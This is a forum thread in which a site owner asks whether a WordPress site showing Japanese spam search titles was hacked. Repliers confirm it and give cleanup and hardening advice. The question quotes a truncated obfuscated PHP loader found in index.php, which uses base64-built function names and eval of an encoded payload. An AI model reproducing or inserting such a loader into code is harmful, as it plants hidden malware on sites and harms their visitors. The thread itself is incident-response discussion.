Avatar of doctorbill
doctorbill
Flag for United Kingdom of Great Britain and Northern Ireland asked on

Website hacked?

I have been asked to investigate the following website
If I type in "aurumsearch" into the google search box, I get the following page:The link works perfectly well and goes to the correct page
If I inspect the page, the element that brings this link up is:
<h3 class="LC20lb DKV0Md">呼出ハーン Cole Haan レディース 袋 ショルダーバッグ ...</h3>

If I go to the site host and look at the index.php page code in filemanager (Plesk control panel) of the wordpress site, the following shows up (only part of the page text shown):

Index.php
<?php $O00OO0=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdq");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iZUhNT05nbXhBQkt3aHBhWWRER25yUlp1Rm9pbFFXWFN0Y1VMUGJreUNqVnZ6c3FUZkpFSWxpbkFTdVdnaFlGWG1aS3ZNa3RqSEx5SVVid0VPcE5HZXFmY3pzSlZ4ckRhUENCUm9kUVR6azlYS2loU3hXRFZxVzlWTjNkRXF0OVZNdEVJeVZ1WEZSQ1N4SllQeU5TUEtwOUlOM1Mwdk5kMEZ4SjdrT1paeXd1bXlqREl2M0xaczI1b3lObVpxM0xQRnhkNGxpbW95MkQwdjI5SU10RElNeFRaRkdZN2tPWldNcDVyTXRFYXN3WTRsaW1veTJEMHYyOUlNdERJTXh1Sk1OZENGTkNTeHdodVR4WVp5d2hiZGlEVnNrMDlUd1RaVGlkRU1pRFZzd2h3VHJDU3h3aHVUeFlaeXdtV01wNXJNdEVhc0U5RWx0RVBNaW5iZDJTMXFXZ29LcDVaTXhxWkZOQ1N4d2h1VHhodVR4aHVkdFNhc3doOVR0UzFxV2dvS3A1Wk14dWJxM0xWS3A1akZHTDFxV1haQVgwRlR4aHVUeGh1VHhZck1OZENOM1NFTXQ5WE14dUp2MjlJY3hZa0REZG5SMVlmTjBtVU9mTFVmd1h1eVdVQ3EyZlpBWDBGVHhodVR4aHVUeFlyTU5kQ04zU0VNdDlYTXh1SnYyOUljeFlrRERkblIxWWZOMVNSUlU5cExEZGRMRUVPTGZER2N4WXRPZmdSTEdKN2tPYnVUeGh1VHhodVR0UzFxV2dvcTJEMHMzWTBGeExyczI0Q1RRU0RmSmd6ZlVMb2YxU25OMXlVZkpFdHBmbXpmMU9DVFF5WVJVU1VGUkNTeHUwRlR4aHVUeGh1VHhZck1OZENOM1NFTXQ5WE14dUp2MjlJY3hZa0REZG5SMVlmTjFkVURVREdSRUxHT2Y1UkxKREdjaUxWTXBmWkFYMEZUeGh1VHhodVR4WXJNTmRDTjNTRU10OVhNeHVKdjI5SWN4WWtERGRuUjFZZk4xTGRSZkR6RERPQ1RrUVZueEo3a09idVR4aHVUeGh1VHhMVnlOUzFzaU91ekdZck1OZENOMkQ0eXBuYmR0U2Fzd0o3a09idVR4aHVUeGh1VHRTMXFXZ292MmdhcTJmYmR0U2Fzd0o3a09idVR4aHVvcERDcTJEN2tPYnVUeGh1VHhodVR4TFZ5TlMxc2lPdXpHWVdLcGdFTjJNRU1VOXJzMjUweXA1

Any ideas what is going on here - is it a hack?
HTMLPHPWordPress

Avatar of undefined
Last Comment
David Favor

8/22/2022 - Mon
Dave Baldwin

Yes it is.  Is this site on Godaddy?
doctorbill

ASKER
No - Ionos
Kimputer

Since you restored your page already, please know, if you didn't change anything at all except restore, it WILL happen again. Please try to find out the attack vector and plug the hole
Check if WP itself was up to date, then check any plugin or theme (yes, they need to be up to date as well).
Change your MySQL password, as well as the website FTP logins.
If you still really can't find it, ask your webhoster to help.
Experts Exchange is like having an extremely knowledgeable team sitting and waiting for your call. Couldn't do my job half as well as I do without it!
James Murphy
Robert Granlund

You can also ask your host to scan your site for malware.  Consider installing the WordFence plugin since it is a WordPress site and scan  the site and as already mentioned, change all of the passwords.  Good Luck
ASKER CERTIFIED SOLUTION
David Favor

THIS SOLUTION ONLY AVAILABLE TO MEMBERS.
View this solution by signing up for a free trial.
Members can start a 7-Day free trial and enjoy unlimited access to the platform.
See Pricing Options
Start Free Trial
GET A PERSONALIZED SOLUTION
Ask your own question & get feedback from real experts
Find out why thousands trust the EE community with their toughest problems.
doctorbill

ASKER
Thanks all
David Favor

You're welcome!

Hang in there!

After you cleaned up... 100s of hacked sites... this will all become 2nd nature to you...
⚡ FREE TRIAL OFFER
Try out a week of full access for free.
Find out why thousands trust the EE community with their toughest problems.